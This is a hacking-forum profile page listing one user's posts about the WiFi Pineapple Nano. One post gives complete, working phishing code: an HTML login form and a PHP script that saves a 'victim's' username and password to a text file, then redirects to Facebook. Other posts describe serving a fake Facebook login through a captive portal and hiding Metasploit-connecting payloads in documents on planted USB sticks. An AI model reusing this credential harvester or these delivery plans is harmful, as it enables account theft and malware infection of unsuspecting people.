Jump to content

Mother

Active Members
  • Posts

    67
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Mother's Achievements

Newbie

Newbie (1/14)

  1. Figured it out. I didnt have php installed correctly. Now to get it on the Nano.
  2. First off I am no coder so. I want to create a custom html that ask a victim for creds then post the creds to a txt file in current directory. So far I have a simple html . login.html <form action="login.php" method="post"> <input type="text" id="username" name="username"/> <input type="password" id="password" name="password"/> <input type="submit" name="Login" value="Login"> </form> login.php <html> <head> <title>Login</title> </head> <body> <?php //If Submit Button Is Clicked Do the Following if ($_POST['Login']){ $myFile = "log.txt"; $fh = fopen($myFile, "w+") or die("can't open file"); $stringData = $_POST['username'] . ":"; echo fwrite($fh, $stringData); $stringData = $_POST['password'] . "\n"; echo fwrite($fh, $stringData); fclose($fh); } ?> <script>location.href='https://facebook.com';</script> </body> </html> I am running this on Kali with Apache2. I can input the text and hit login then it redirects me to Facebook just fine. The only issue is that is does not create the log.txt in /var/www. I am on Kali 2016.2. I want to move this the the Nano for the captive portal. Any Ideas??? Thanks
  3. Any tutorials on how to hide code in a picture?
  4. What I am trying to accomplish is deploying about 15-20 usb sticks around the offices and want to test users to see if they just plug them in. The issue is I do not want to purchase 15-20 Rubber Duckies and end up loosing half of them. I was thinking of creating some malicious pdf, excel, doc, or image and seeing who actually plugs the usb in and opens the file. Does anyone have any ideas on how to perform this? I do have working powershell scripts that connect to my MSF handler successfully but not sure how to hide the code into something else. Thanks in advance
  5. So I am trying to configure the landing page with an iframe string but when I click save it does not save it. Also I try to clear out the SSID pool but they just keep coming back. Any ideas?
  6. Hello all So I want to see if it is possible to set up the nano with a fake facebook login page and have clients that go to FB to hit the nano's fake FB login, capture the account info then send them on to the real FB login. I have some scripts that seem to work with capturing the passwords but I am not sure of to get them on the Nano. Any tutorials out there on this? Thanks
  7. When I login into the dashboard all I have is a screen with 'WiFi Pineapple' in the upper left corner. Nothing else. I have tried to reset it to factory by pressing the reset button for 6 seconds. Any suggestions?
  8. OK I think I understand now. The AP is WPA2 protect so that is why it is not working. Also, I misspoke, the clients are associated the AP. Thanks - Still learning
  9. Good to know. I am having the same issues.
  10. Are you wanting to capture unassociated or associated clients? > unassociated Are you trying to Deauth a client? > Yes Do you want any client to connect or a certain client to connect? > any client Are you posing as an AP that is using WPA2 or as an open AP? The AP is using WPA2
×
×
  • Create New...